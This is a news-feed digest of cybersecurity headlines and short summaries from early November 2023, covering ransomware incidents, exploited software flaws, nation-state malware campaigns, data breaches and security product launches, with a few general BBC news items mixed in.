            A new set of malicious Python packages has slithered their way to the Python Package Index (PyPI) repository with the ultimate aim of stealing sensitive information from compromised developer systems. The packages masquerade as seemingly innocuous obfuscation tools, but harbor a piece of malware called BlazeStealer, Checkmarx said in a report shared with The Hacker News. "[BlazeStealer]


            Five Canadian Hospitals impacted by a ransomware attack on TransForm provider

            exploits ransomware
            2023-11-08 https://securityaffairs.com/153857/cyber-crime/canadian-hospitals-transform-ransomware-attack.html

            Five Canadian hospitals were victims of a ransomware attack; threat actors claim to have stolen data from them and leaked it. Five Canadian hospitals revealed they were victims of ransomware attacks after threat actors leaked alleged stolen data. The impacted hospitals are Bluewater Health, Chatham-Kent Health Alliance, Erie Shores HealthCare, Hôtel-Dieu Grace Healthcare, and Windsor […]

            The post Five Canadian Hospitals impacted by a ransomware attack on TransForm provider appeared first on Security Affairs.

            Autosummary: In October, CISA, the FBI, and the Department of Health and Human Services (HHS) warned that the Daixin Team cybercrime group is actively targeting U.S. businesses, mainly in the Healthcare and Public Health (HPH) Sector, with ransomware operations. Exposed data includes names, addresses, social insurance numbers, gender, marital status, date of birth, and rates of pay.


            Russian state-owned Sberbank hit by 1 million RPS DDoS attack

            financial government rusia-ucrania
            2023-11-08 https://www.bleepingcomputer.com/news/security/russian-state-owned-sberbank-hit-by-1-million-rps-ddos-attack/
            Russian financial organization Sberbank states in a press release that two weeks ago it faced the most powerful distributed denial of service (DDoS) attack in recent history. [...]

            Autosummary: A more recent blow suffered by Russia’s financial system concerns the National Payment Card System (NSPK), the Mir card operator, whose website became unavailable on October 30, 2023, and was later defaced to post messages about a client-impacting data breach.


            FBI: Ransomware gangs hack casinos via 3rd party gaming vendors

            exploits ransomware
            2023-11-08 https://www.bleepingcomputer.com/news/security/fbi-ransomware-gangs-hack-casinos-via-3rd-party-gaming-vendors/
            The Federal Bureau of Investigation is warning that ransomware threat actors are targeting casino servers and using legitimate system management tools to increase their permissions on the network. [...]

            Autosummary: "New trends included ransomware actors exploiting vulnerabilities in vendor-controlled remote access to casino servers, and companies victimized through legitimate system management tools to elevate network permissions," the agency explains.


            Phosphorus and Check Point integrate to provide xIoT visibility and protection

            industry
            2023-11-08 https://www.helpnetsecurity.com/2023/11/08/phosphorus-check-point/

            Phosphorus has integrated with Check Point to provide the asset-centric xIoT visibility at the network level. Phosphorus’s Intelligent Active Discovery (IAD) engine and device posture assessment capabilities are able to enrich network-centric technologies with previously unseen levels of high-resolution xIoT device detail, granular risk assessment context, and deep device metadata. This enables organizations to centralize visibility for all of their xIoT assets and facilitate decision-making in the Check Point security infrastructure. Phosphorus uses native device … More

            The post Phosphorus and Check Point integrate to provide xIoT visibility and protection appeared first on Help Net Security.

            Autosummary: Key integration benefits for customers include the following. xIoT visibility: powered by Phosphorus’s IAD engine, the new integration utilizes the industry’s most advanced xIoT discovery capability, which is 98% faster than traditional passive scanners, 95% more efficient (lighter) and provides 100% device certainty the first time. Advanced risk posture view: Phosphorus’s evidence-based risk assessment capability collects over 3X more data points from xIoT assets than other services – including deep detail on devices running with default passwords, insecure configurations, vulnerable or outdated firmware, and more.


            FBI: Ransomware actors abuse third parties and legitimate system tools for initial access

            exploits ransomware
            2023-11-08 https://securityaffairs.com/153873/cyber-crime/fbi-ransomware-actors-new-trends.html

            The FBI published a PIN alert warning of ransomware operators compromising third-party vendors and services for initial access to target environments. The Federal Bureau of Investigation (FBI) published a Private Industry Notification (PIN) to warn of ransomware initial access trends and provide recommendations to reduce the attack surface to ransomware attacks. As of July 2023, […]

            The post FBI: Ransomware actors abuse third parties and legitimate system tools for initial access appeared first on Security Affairs.

            Autosummary: To be prepared for cyber incidents, organizations should maintain offline backups of data and regularly maintain backup and restoration; ensure all backup data is encrypted and immutable and covers the entire organization’s data infrastructure; and ensure their backup data is not already infected.


            Co-working giant WeWork files for bankruptcy in the US

            financial
            2023-11-07 https://www.bbc.co.uk/news/business-67316150?at_medium=RSS&at_campaign=KARANGA
            The co-working giant, once seen as the future of the workplace, has been plagued by financial problems.


            Microsegmentation proves its worth in ransomware defense

            exploits ransomware
            2023-11-07 https://www.helpnetsecurity.com/2023/11/07/ransomware-microsegmentation-strategies/

            The number of ransomware attacks (successful and unsuccessful) has doubled over the past two years, from 43 on average in 2021 to 86 in 2023, according to Akamai. Security organizations have responded to the recent rise in ransomware attacks by implementing zero trust and microsegmentation strategies. 99% of respondents who reported that they have deployed some form of segmentation have also deployed a zero trust security framework. Zero trust and microsegmentation: Respondents overwhelmingly agreed that … More

            The post Microsegmentation proves its worth in ransomware defense appeared first on Help Net Security.

            Autosummary: Globally, the top obstacles to deploying microsegmentation are a lack of skills/expertise (39%) followed by increased performance bottlenecks (39%), and compliance requirements (38%).


            Looney Tunables bug exploited for cryptojacking

            exploits
            2023-11-07 https://www.helpnetsecurity.com/2023/11/07/kinsing-exploiting-looney-tunables/

            Kinsing threat actors have been spotted exploiting the recently disclosed Looney Tunables (CVE-2023-4911) vulnerability to covertly install cryptomining software into cloud-native environments. Kinsing (aka Money Libra) is a threat actor group that has been active since late 2021, targeting cloud-native environments and applications – Kubernetes clusters, Docker API, Redis, Jenkins and Openfire servers, cloud-hosted Apache NiFi instances, and so on – to deploy cryptominers. Kinsing exploiting PHPUnit and Looney Tunables vulnerabilities: In this latest attack … More

            The post Looney Tunables bug exploited for cryptojacking appeared first on Help Net Security.


            SideCopy Exploiting WinRAR Flaw in Attacks Targeting Indian Government Entities

            exploits government
            2023-11-07 https://thehackernews.com/2023/11/sidecopy-exploiting-winrar-flaw-in.html
            The Pakistan-linked threat actor known as SideCopy has been observed leveraging the recent WinRAR security vulnerability in its attacks targeting Indian government entities to deliver various remote access trojans such as AllaKore RAT, Ares RAT, and DRat. Enterprise security firm SEQRITE described the campaign as multi-platform, with the attacks also designed to infiltrate Linux systems with a


            Experts Warn of Ransomware Hackers Exploiting Atlassian and Apache Flaws

            exploits ransomware
            2023-11-07 https://thehackernews.com/2023/11/experts-warn-of-ransomware-hackers.html
            Multiple ransomware groups have begun to actively exploit recently disclosed flaws in Atlassian Confluence and Apache ActiveMQ. Cybersecurity firm Rapid7 said it observed the exploitation of CVE-2023-22518 and CVE-2023-22515 in multiple customer environments, some of which have been leveraged for the deployment of Cerber (aka C3RB3R) ransomware. Both vulnerabilities are critical, allowing threat


            Marina Bay Sands discloses data breach impacting 665,000 customers

            financial
            2023-11-07 https://www.bleepingcomputer.com/news/security/marina-bay-sands-discloses-data-breach-impacting-665-000-customers/
            The Marina Bay Sands (MBS) luxury resort and casino in Singapore has disclosed a data breach that impacts personal data of 665,000 customers. [...]


            Introducing ThreatDown: A new chapter for Malwarebytes

            exploits
            2023-11-07 https://www.malwarebytes.com/blog/news/2023/11/threatdown-a-new-chapter-for-malwarebytes
            An evolution in cybersecurity is needed. It starts with us. Announcing ThreatDown.

            Autosummary: There are ransomware gangs, crypto-scammers, Advanced Persistent Threat groups, data exfiltration and extortion schemes, big-money exploits, disastrous zero-days, brute force attacks, Living-Off-the-Land techniques—that anti-virus detection doesn’t find—and fast evolving social engineering tactics that will only advance with the broad availability of generative AI. Removing it was a team effort, and it led to the creation of the first iteration of Malwarebytes, a free tool built to help everyday people find and remove malware from their computers, without needing to scour forums, write code, or run scripts like I had.


            Malwarebytes ThreatDown helps organizations to overpower threats

            exploits
            2023-11-07 https://www.helpnetsecurity.com/2023/11/07/malwarebytes-threatdown/

            Malwarebytes launched ThreatDown, the product family that protects IT-constrained organizations with effective, easy-to-use cybersecurity. Formerly named Malwarebytes for Business, ThreatDown solutions are purpose-built to overpower threats, while empowering IT, through easy-to-use, effective technologies like the new Security Advisor dashboard and ThreatDown Bundles that combine the technologies and services needed to protect organizations from today’s sophisticated cyber landscape. Today, the company has two business units operating under the Malwarebytes executive leadership team to best serve its … More

            The post Malwarebytes ThreatDown helps organizations to overpower threats appeared first on Help Net Security.

            Autosummary: Formerly named Malwarebytes for Business, ThreatDown solutions are purpose-built to overpower threats, while empowering IT, through easy-to-use, effective technologies like the new Security Advisor dashboard and ThreatDown Bundles that combine the technologies and services needed to protect organizations from today’s sophisticated cyber landscape.


            N. Korea's BlueNoroff Blamed for Hacking macOS Machines with ObjCShellz Malware

            exploits
            2023-11-07 https://thehackernews.com/2023/11/n-korean-bluenoroff-blamed-for-hacking.html
            The North Korea-linked nation-state group called BlueNoroff has been attributed to a previously undocumented macOS malware strain dubbed ObjCShellz. Jamf Threat Labs, which disclosed details of the malware, said it's used as part of the RustBucket malware campaign, which came to light earlier this year. "Based on previous attacks performed by BlueNoroff, we suspect that this malware was a late


            New GootLoader Malware Variant Evades Detection and Spreads Rapidly

            exploits
            2023-11-07 https://thehackernews.com/2023/11/new-gootloader-malware-variant-evades.html
            A new variant of the GootLoader malware called GootBot has been found to facilitate lateral movement on compromised systems and evade detection. "The GootLoader group's introduction of their own custom bot into the late stages of their attack chain is an attempt to avoid detections when using off-the-shelf tools for C2 such as CobaltStrike or RDP," IBM X-Force researchers Golo Mühr and Ole

            Autosummary: "Currently observed campaigns leverage SEO-poisoned searches for themes such as contracts, legal forms, or other business-related documents, directing victims to compromised sites designed to look like legitimate forums where they are tricked into downloading the initial payload as an archive file," the researchers said.


            ThreatDown powered by Malwarebytes: A 15 Year Journey

            exploits
            2023-11-07 https://www.malwarebytes.com/blog/business/2023/11/threatdown-powered-by-malwarebytes-a-15-year-journey
            With the release of ThreatDown, let's take a look at Malwarebytes' 15-year legacy and what's next.

            Autosummary: Securing Against the Next Generation of Threats (2023 and beyond): 2023 marked our foray into Mobile Protection for iOS, Android, and Chromebook platforms, helping organizations crush mobile threats on iOS, Android, and ChromeOS. Managed Detection and Response (2022): Last year, we delved into a multitude of new services and tools, including Device Control, Vulnerability Assessment, Patch Management Modules, and many more. ThreatDown’s mission for businesses is straightforward: neutralize threats promptly and efficiently, without the need for extensive IT teams, prolonged setup times, or substantial budgets.


            IRONSCALES expands platform capabilities to improve employee phishing awareness

            financial
            2023-11-07 https://www.helpnetsecurity.com/2023/11/07/ironscales-detection-capabilities/

            IRONSCALES announced its Fall ’23 Release, strengthening its foundational behavioral analysis with deep image-based detection capabilities to stop email attacks that bypass text analysis such as QR code phishing attacks (or quishing). Additionally, IRONSCALES released phishing simulation testing enhancements with the launch of Autonomous Campaigns, enabling security administrators to automate phishing simulation testing campaigns, making it easier and faster to train employees on the latest phishing attacks. These new capabilities provide better organizational protection and … More

            The post IRONSCALES expands platform capabilities to improve employee phishing awareness appeared first on Help Net Security.

            Autosummary: With the addition of deep image-based detection capabilities, IRONSCALES unites its foundational behavioral analysis with Optical Character Recognition (OCR), deep-text and image processing, and natural language models for comprehensive, multi-modal protection of image-based phishing threats.


            Marina Bay Sands Luxury Hotel in Singapore Suffers a Data Breach

            financial
            2023-11-07 https://securityaffairs.com/153828/data-breach/marina-bay-sands-data-breach.html

            The iconic integrated resort Marina Bay Sands in Singapore has disclosed a data breach that impacted 665,000 customers. The Marina Bay Sands (MBS) luxury resort in Singapore has suffered a data breach that impacted 665,000 customers. Marina Bay Sands discovered the security breach on 20 October 2023; an unauthorized third party gained access to some […]

            The post Marina Bay Sands Luxury Hotel in Singapore Suffers a Data Breach appeared first on Security Affairs.


            TransForm says ransomware data breach affects 267,000 patients

            financial exploits ransomware
            2023-11-07 https://www.bleepingcomputer.com/news/security/transform-says-ransomware-data-breach-affects-267-000-patients/
            Shared service provider TransForm has published an update on the cyberattack that recently impacted operations in multiple hospitals in Ontario, Canada, clarifying that it was a ransomware attack. [...]

            Autosummary: “Bluewater Health, Chatham-Kent Health Alliance, Erie Shores HealthCare, Hôtel-Dieu Grace Healthcare and Windsor Regional Hospital, and our shared service provider TransForm Shared Service Organization were recently the victims of a ransomware attack,” reads the statement. “We did not pay a ransom and we are aware that data connected to the cyber incident has been published.”


            BlueNoroff hackers backdoor Macs with new ObjCShellz malware

            exploits
            2023-11-07 https://www.bleepingcomputer.com/news/security/bluenoroff-hackers-backdoor-macs-with-new-objcshellz-malware/
            The North Korean-backed BlueNorOff threat group targets Apple customers with new macOS malware tracked as ObjCShellz that can open remote shells on compromised devices. [...]

            Autosummary: Last year, Kaspersky linked the BlueNorOff hackers to a long string of attacks targeting cryptocurrency startups around the world, including in the U.S., Russia, China, India, the U.K., Ukraine, Poland, Czech Republic, UAE, Singapore, Estonia, Vietnam, Malta, Germany, and Hong Kong.


            Fourteen Venezuelan migrants killed in Chile fire

            latam
            2023-11-07 https://www.bbc.co.uk/news/world-latin-america-67341310?at_medium=RSS&at_campaign=KARANGA
            Eight children were among those killed in the fire at a migrant settlement in southern Chile.


            The roadblocks to preventive cybersecurity success

            ciber
            2023-11-06 https://www.helpnetsecurity.com/2023/11/06/preventive-cybersecurity-practice/

            In the last two years, the average organization’s cybersecurity program was prepared to defend preventively, or block, just 57% of the cyberattacks it encountered, according to Tenable. This means 43% of attacks launched against them are successful and must be remediated after the fact. 58% of respondents say they focus almost entirely on fighting successful attacks rather than working to prevent them in the first place. The study finds that this is largely due to … More

            The post The roadblocks to preventive cybersecurity success appeared first on Help Net Security.

            Autosummary: In order, the highest perceived risks come from the use of public cloud (30%), multi-cloud and/or hybrid cloud (23%), private cloud infrastructure (12%) and cloud container management tools (9%).


            U.S. Treasury Sanctions Russian Money Launderer in Cybercrime Crackdown

            financial rusia-ucrania
            2023-11-06 https://thehackernews.com/2023/11/us-treasury-targets-russian-money.html
            The U.S. Department of the Treasury imposed sanctions against a Russian woman for taking part in the laundering of virtual currency for the country's elites and cybercriminal crews, including the Ryuk ransomware group. Ekaterina Zhdanova, per the department, is said to have facilitated large cross border transactions to assist Russian individuals to gain access to Western financial markets and

            Autosummary: Ryuk, a predecessor to the Conti ransomware, first emerged on the threat landscape in 2018, and has compromised governments, academia, healthcare, manufacturing, and technology organizations worldwide.


            Atlassian Confluence data-wiping vulnerability exploited

            exploits
            2023-11-06 https://www.helpnetsecurity.com/2023/11/06/cve-2023-22518-exploit/

            Threat actors are trying to exploit CVE-2023-22518, a critical Atlassian Confluence flaw that allows unauthenticated attackers to reset vulnerable instances’ database, Greynoise is observing. The Shadowserver Foundation has also seen 30+ IP addresses testing for the flaw in internet-facing Confluence installations. From security updates to active exploitation: Atlassian released security updates for CVE-2023-22518 on October 31 and urged customers to upgrade quickly, even though there was no indication that the vulnerability was being targeted. “Instances … More

            The post Atlassian Confluence data-wiping vulnerability exploited appeared first on Help Net Security.


            Iranian Hackers Launch Destructive Cyberattacks on Israeli Tech and Education Sectors

            ciber
            2023-11-06 https://thehackernews.com/2023/11/iranian-hackers-launches-destructive.html
            Israeli higher education and tech sectors have been targeted as part of a series of destructive cyber attacks that commenced in January 2023 with an aim to deploy previously undocumented wiper malware. The intrusions, which took place as recently as October, have been attributed to an Iranian nation-state hacking crew it tracks under the name Agonizing Serpens, which is also known as Agrius,

            Autosummary: A lateral movement phase is followed by data exfiltration using a mix of public and custom tools like Sqlextractor, WinSCP, and PuTTY, and finally by delivery of the wiper malware MultiLayer, a .NET malware that enumerates files for either deletion or corruption with random data to resist recovery efforts, and renders the system unusable by wiping the boot sector.


            Cybercrime service bypasses Android security to install malware

            exploits
            2023-11-06 https://www.bleepingcomputer.com/news/security/cybercrime-service-bypasses-android-security-to-install-malware/
            A new dropper-as-a-service (DaaS) named "SecuriDropper" has emerged, using a method that bypasses Android 13's "Restricted Settings" to install malware on devices and grant them access to the Accessibility Services. [...]

            Autosummary: Android Dropper-as-a-Service operations: SecuriDropper infects Android devices posing as a legitimate app, most often impersonating a Google app, Android update, video player, security app, or a game, and then installing a second payload, which is some form of malware.


            Okta breach post mortem reveals weaknesses exploited by attackers

            exploits
            2023-11-06 https://www.helpnetsecurity.com/2023/11/06/okta-support-compromised-service-account/

            The recent breach of the Okta Support system was carried out via a compromised service account with permissions to view and update customer support cases. “During our investigation into suspicious use of this account, Okta Security identified that an employee had signed in to their personal Google profile on the Chrome browser of their Okta-managed laptop. The username and password of the service account had been saved into the employee’s personal Google account,” David Bradbury, Chief … More

            The post Okta breach post mortem reveals weaknesses exploited by attackers appeared first on Help Net Security.

            Autosummary: To prevent similar attacks in the future, they: implemented a configuration option within Chrome Enterprise that prevents employees from signing in to Chrome on their Okta-managed laptop using a personal Google profile; deployed additional detection and monitoring rules for the customer support system; and implemented session token binding based on network location, so that stolen/compromised Okta administrator session tokens can’t be used by unauthorized users. “Okta administrators are now forced to re-authenticate if we detect a network change.


            Tommy Robinson and Katie Hopkins reinstated on X

            government
            2023-11-06 https://www.bbc.co.uk/news/technology-67331288?at_medium=RSS&at_campaign=KARANGA
            Their return, after bans for hate speech violations, has been criticised by campaigners.


            Critical Atlassian Confluence bug exploited in Cerber ransomware attacks

            exploits ransomware
            2023-11-06 https://www.bleepingcomputer.com/news/security/critical-atlassian-confluence-bug-exploited-in-cerber-ransomware-attacks/
            Attackers are exploiting a recently patched and critical severity Atlassian Confluence authentication bypass flaw to encrypt victims" files using Cerber ransomware. [...] "

            Autosummary: CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) issued a joint advisory last month, urging network administrators to immediately secure Atlassian Confluence servers against the actively exploited CVE-2023-22515 privilege escalation bug, which has been under active exploitation since at least September 14, according to a Microsoft report.


            US sanctions Russian who laundered money for Ryuk ransomware affiliate

            financial exploits ransomware rusia-ucrania
            2023-11-06 https://www.bleepingcomputer.com/news/security/us-sanctions-russian-who-laundered-money-for-ryuk-ransomware-affiliate/
            The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) has sanctioned Russian national Ekaterina Zhdanova for laundering millions in cryptocurrency for various individuals, including ransomware actors. [...]



            TellYouThePass ransomware joins Apache ActiveMQ RCE attacks

            exploits ransomware
            2023-11-06 https://www.bleepingcomputer.com/news/security/tellyouthepass-ransomware-joins-apache-activemq-rce-attacks/
            Internet-exposed Apache ActiveMQ servers are also targeted in TellYouThePass ransomware attacks targeting a critical remote code execution (RCE) vulnerability previously exploited as a zero-day. [...]



            New Jupyter Infostealer Version Emerges with Sophisticated Stealth Tactics

            industry
            2023-11-06 https://thehackernews.com/2023/11/new-jupyter-infostealer-version-emerges.html
            An updated version of an information stealer malware known as Jupyter has resurfaced with "simple yet impactful changes" that aim to stealthily establish a persistent foothold on compromised systems. "The team has discovered new waves of Jupyter Infostealer attacks which leverage PowerShell command modifications and signatures of private keys in attempts to pass off the malware as a legitimately

            Autosummary: Cybersecurity firm Bitsight, which revealed details of the service last week, said it identified at least 53 servers related to the botnet that are distributed across France, Bulgaria, Netherlands, and Sweden.


            Critical Confluence flaw exploited in ransomware attacks

            exploits ransomware
            2023-11-06 https://securityaffairs.com/153732/security/confluence-flaw-ransomware-attacks.html

            Experts warn that threat actors have started exploiting the recent critical flaw CVE-2023-22518 in Confluence Data Center and Confluence Server. Over the weekend threat actors started exploiting a recently disclosed vulnerability (CVE-2023-22518) in all versions of Atlassian Confluence Data Center and Confluence Server. Atlassian last week warned of CVE-2023-22518 (CVSS score 9.1); the issue is an […]


            Autosummary: The vulnerability was addressed with the release of the following versions: 7.19.16 or later, 8.3.4 or later, 8.4.4 or later, 8.5.3 or later, and 8.6.1 or later. Atlassian states that there is no impact on confidentiality as an attacker cannot exfiltrate any instance data.


            Veeam warns of critical bugs in Veeam ONE monitoring platform

            exploits
            2023-11-06 https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-bugs-in-veeam-one-monitoring-platform/
            Veeam released hotfixes today to address four vulnerabilities in the company's Veeam ONE IT infrastructure monitoring and analytics platform, two of them critical. [...]



            Hackers exploit Looney Tunables Linux bug, steal cloud creds

            exploits Linux
            2023-11-06 https://www.bleepingcomputer.com/news/security/hackers-exploit-looney-tunables-linux-bug-steal-cloud-creds/
            The operators of the Kinsing malware are targeting cloud environments with systems vulnerable to "Looney Tunables," a Linux security issue identified as CVE-2023-4911 that allows a local attacker to gain root privileges on the system. [...]

            Autosummary: Figure: CVE-2017-9841 exploitation (AquaSec). Exploiting the PHPUnit flaw (CVE-2017-9841) leads to opening a reverse shell over port 1337 on the compromised system, which Kinsing operators leverage to execute reconnaissance commands like "uname -a" and "passwrd."


            Week in review: Exploited Citrix Bleed vulnerability, Atlassian patches critical Confluence bug

            exploits
            2023-11-05 https://www.helpnetsecurity.com/2023/11/05/week-in-review-exploited-citrix-bleed-vulnerability-atlassian-patches-critical-confluence-bug/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: AI threat landscape: Model theft and inference attacks emerge as top concerns In this Help Net Security interview, Guy Guzner, CEO at Savvy, discusses the challenges and opportunities presented by in-house AI models, the security landscape surrounding them, and the future of AI cybersecurity. A closer look at healthcare’s battle with AI-driven attacks In this Help Net Security interview, Troy … More


            Autosummary: Infosec products of the month: October 2023 Here’s a look at the most interesting products from the past month, featuring releases from: Appdome, Arcitecta, AuditBoard, BackBox, Cloaked, ComplyCube, Darktrace, Data Theorem, Flexxon, Fortanix, Fortinet, Jumio, LogicMonitor, Malwarebytes, ManageEngine, Nutanix, Prevalent, Progress, SailPoint, Thales, Vanta, Veriff, and Wazuh.


            Lazarus targets blockchain engineers with new KandyKorn macOS Malware

            exploits
            2023-11-05 https://securityaffairs.com/153622/hacking/lazarus-kandykorn-malware.html

            North Korea-linked Lazarus group is using new KandyKorn macOS Malware in attacks against blockchain engineers. The North Korea-linked Lazarus APT group was spotted using new KandyKorn macOS malware in attacks against blockchain engineers, reported Elastic Security Labs. “KandyKorn is an advanced implant with a variety of capabilities to monitor, interact with, and avoid detection. It utilizes […]


            Autosummary: The malware supports multiple capabilities such as harvesting information, listing directories and running processes, downloading files, uploading files, archiving directories and exfiltrating them, killing processes, executing commands using a terminal, spawning a shell, downloading a configuration from the server, sleeping, and exiting.


            US govt sanctioned a Russian woman for laundering virtual currency on behalf of threat actors

            rusia-ucrania
            2023-11-05 https://securityaffairs.com/153649/breaking-news/russian-woman-virtual-currency-money-laundering.html

            The Treasury Department sanctioned a Russian woman accused of laundering virtual currency on behalf of cybercriminals. The Department of the Treasury’s Office of Foreign Assets Control (OFAC) on Friday sanctioned Ekaterina Zhdanova, a Russian national, for her role in laundering and managing virtual currency on behalf of Russian elites, ransomware operators, and other threat actors. “Through […]


            Autosummary: “Through key facilitators like Zhdanova, Russian elites, ransomware groups, and other illicit actors sought to evade U.S. and international sanctions, particularly through the abuse of virtual currency,” said Under Secretary of the Treasury for Terrorism and Financial Intelligence Brian E. Nelson.


            Okta's Recent Customer Support Data Breach Impacted 134 Customers

            financial
            2023-11-04 https://thehackernews.com/2023/11/oktas-recent-customer-support-data.html
            Identity and authentication management provider Okta on Friday disclosed that the recent support case management system breach affected 134 of its 18,400 customers. It further noted that the unauthorized intruder gained access to its systems from September 28 to October 17, 2023, and ultimately accessed HAR files containing session tokens that could be used for session hijacking attacks. "The

            Autosummary: "The threat actor was able to use these session tokens to hijack the legitimate Okta sessions of 5 customers," Okta's Chief Security Officer, David Bradbury, said.


            Discord will switch to temporary file links to block malware delivery

            exploits
            2023-11-04 https://www.bleepingcomputer.com/news/security/discord-will-switch-to-temporary-file-links-to-block-malware-delivery/
            Discord will switch to temporary file links for all users by the end of the year to block attackers from using its CDN (content delivery network) for hosting and pushing malware. [...]

            Autosummary: According to Trellix's data, various malware families, including Agent Tesla, UmbralStealer, Stealerium, and zgRAT, have also used Discord webhooks over the past few years to steal sensitive information like credentials, browser cookies, and cryptocurrency wallets from compromised devices.


            StripedFly Malware Operated Unnoticed for 5 Years, Infecting 1 Million Devices

            exploits
            2023-11-04 https://thehackernews.com/2023/11/stripedfly-malware-operated-unnoticed.html
            An advanced strain of malware masquerading as a cryptocurrency miner has managed to fly under the radar for over five years, infecting no less than one million devices around the world in the process. That's according to findings from Kaspersky, which has codenamed the threat StripedFly, describing it as an "intricate modular framework that supports both Linux and Windows." The Russian cybersecurity

            Autosummary: On Linux, persistence is accomplished by means of a systemd user service, autostarted .desktop file, or by modifying /etc/rc*, profile, bashrc, or inittab files. "It comes equipped with a built-in TOR network tunnel for communication with command servers, along with update and delivery functionality through trusted services such as GitLab, GitHub, and Bitbucket, all using custom encrypted archives.


            "Crypto King" Sam Bankman-Fried guilty of FTX fraud

            financial
            2023-11-03 https://www.bbc.co.uk/news/business-67281759?at_medium=RSS&at_campaign=KARANGA
            The verdict concludes a stunning fall from grace for the 31-year-old former billionaire.



            How cybercriminals adapt and thrive amidst changing consumer trends

            ciber
            2023-11-03 https://www.helpnetsecurity.com/2023/11/03/cybercriminals-modify-tactics-video/

            The email threat landscape is experiencing a profound transformation, adapting to new challenges and exploiting emerging vulnerabilities with speed and sophistication. In this Help Net Security video, Usman Choudhary, CPTO at VIPRE Security Group, discusses how cybercriminals modify their tactics to align with shifting consumer behaviors while taking advantage of technological advancements to carry out their activities and elude capture.



            Healthcare’s road to redefining cybersecurity with modern solutions

            ciber
            2023-11-03 https://www.helpnetsecurity.com/2023/11/03/healthcare-ransomware-data-encryption/

            The rate of data encryption following a ransomware attack in healthcare was the highest in the last three years, according to Sophos. Ransomware attacks continue to grow in sophistication Among those organizations surveyed, cybercriminals successfully encrypted data in nearly 75% of ransomware attacks. This is the highest rate of encryption in the past three years and a significant increase from the 61% of healthcare organizations that reported having their data encrypted last year. In addition, … More


            Autosummary: “What’s more, this number is declining, which suggests the sector is actively losing ground against cyberattackers and is increasingly unable to detect and stop an attack in progress,” said Chester Wisniewski, director, field CTO, Sophos. “All organizations, especially those in healthcare, need to modernize their defensive approach to cybercrime, moving from being solely preventative to actively monitoring and investigating alerts 24/7 and securing outside help in the form of services like managed detection and response (MDR),” concluded Wisniewski.


            Financial organizations embrace automation for enhanced security

            financial
            2023-11-03 https://www.helpnetsecurity.com/2023/11/03/financial-services-applications-flaws/

            The security performance of financial applications generally outperforms other industries, with automation, targeted security training, and scanning via Application Programming Interface (API) contributing to a year-over-year reduction in the percentage of applications containing flaws, according to Veracode. Against a backdrop of major regulations impacting the financial services sector, including the U.S. Securities and Exchange Commission cybersecurity disclosure rules and the E.U. Digital Operational Resilience Act (DORA), Veracode’s study provides recommendations to reduce risk from software … More



            AI is transforming financial crime compliance

            financial
            2023-11-03 https://www.helpnetsecurity.com/2023/11/03/compliance-departments-strategies/

            While 86% of compliance, operations, risk and IT professionals at banks and non-banking financial institutions (NBFIs) surveyed said they would increase spending on AI and ML over the next two years, 93% of respondents said that instead of using automation to reduce staff, they would focus that extra capacity on strategies to manage risk and grow the business, according to WorkFusion. “Leveraging AI-enabled automation technology to enhance efficiency and productivity can help alleviate capacity … More



            Pablo Escobar's feral hippos face cull in Colombia

            latam
            2023-11-03 https://www.bbc.co.uk/news/67306304?at_medium=RSS&at_campaign=KARANGA
            Authorities say they must act to stop a dangerous population explosion among the invasive species.



            KandyKorn macOS malware lobbed at blockchain engineers

            exploits
            2023-11-03 https://www.helpnetsecurity.com/2023/11/03/macos-malware-cryptocurrency/

            North Korean hackers are using novel MacOS malware named KandyKorn to target blockchain engineers of a cryptocurrency exchange platform. The attack By impersonating blockchain engineering community members on Discord, the attackers used social engineering techniques to make victims download a malicious ZIP file. The victims believe they are installing an arbitrage bot, i.e., crypto trading software, but they end up downloading a Python file (Main.py), which downloads and executes Watcher.py, which is used for staging … More



            Kinsing Actors Exploiting Recent Linux Flaw to Breach Cloud Environments

            exploits Linux
            2023-11-03 https://thehackernews.com/2023/11/kinsing-actors-exploit-linux-flaw-to.html
            The threat actors linked to Kinsing have been observed attempting to exploit the recently disclosed Linux privilege escalation flaw called Looney Tunables as part of a "new experimental campaign" designed to breach cloud environments. "Intriguingly, the attacker is also broadening the horizons of their cloud-native attacks by extracting credentials from the Cloud Service Provider (CSP)," cloud



            NodeStealer Malware Hijacking Facebook Business Accounts for Malicious Ads

            exploits
            2023-11-03 https://thehackernews.com/2023/11/nodestealer-malware-hijacking-facebook.html
            Compromised Facebook business accounts are being used to run bogus ads that employ "revealing photos of young women" as lures to trick victims into downloading an updated version of a malware called NodeStealer. "Clicking on ads immediately downloads an archive containing a malicious .exe "Photo Album" file which also drops a second executable written in .NET – this payload is in charge of

            Autosummary: "'Roblox' users can be targeted by scammers (known as 'beamers' by 'Roblox' players) who attempt to steal valuable items or Robux from other players," security researcher Tiago Pereira said.


            Predictive AI in Cybersecurity: Outcomes Demonstrate All AI is Not Created Equally

            ciber
            2023-11-03 https://thehackernews.com/2023/11/predictive-ai-in-cybersecurity-outcomes.html
            Here is what matters most when it comes to artificial intelligence (AI) in cybersecurity: Outcomes. As the threat landscape evolves and generative AI is added to the toolsets available to defenders and attackers alike, evaluating the relative effectiveness of various AI-based security offerings is increasingly important — and difficult. Asking the right questions can help you spot solutions

            Autosummary: This approach, which combines unsupervised, supervised, and active learning in both cloud and local environments, has been refined by analyzing extensive data over time, resulting in a highly effective model capable of accurately predicting and anticipating new threats. In contrast, BlackBerry Cylance's model has demonstrated a strong temporal predictive advantage, maintaining high detection rates without frequent model updates, as illustrated in the chart showing the TPA over months for the fourth-generation Cylance model.


            Russian FSB arrested Russian hackers who supported Ukrainian cyber operations

            rusia-ucrania
            2023-11-03 https://securityaffairs.com/153539/cyber-warfare-2/fsb-arrested-russian-hackers-supported-ukraine.html

            The FSB arrested two Russian hackers who are accused of having helped Ukrainian entities carry out cyberattacks on critical infrastructure targets. The Russian intelligence agency Federal Security Service (FSB) arrested two individuals who are suspected of supporting Ukrainian entities to carry out cyberattacks to disrupt Russian critical infrastructure. The two men are facing high treason […]


            Autosummary: Russian FSB arrested Russian hackers who supported Ukrainian cyber operations, by Pierluigi Paganini, November 03, 2023.


            American Airlines pilot union hit by ransomware attack

            exploits ransomware
            2023-11-03 https://www.bleepingcomputer.com/news/security/american-airlines-pilot-union-hit-by-ransomware-attack/
            Allied Pilots Association (APA), a labor union representing 15,000 American Airlines pilots, disclosed a ransomware attack that hit its systems on Monday. [...]



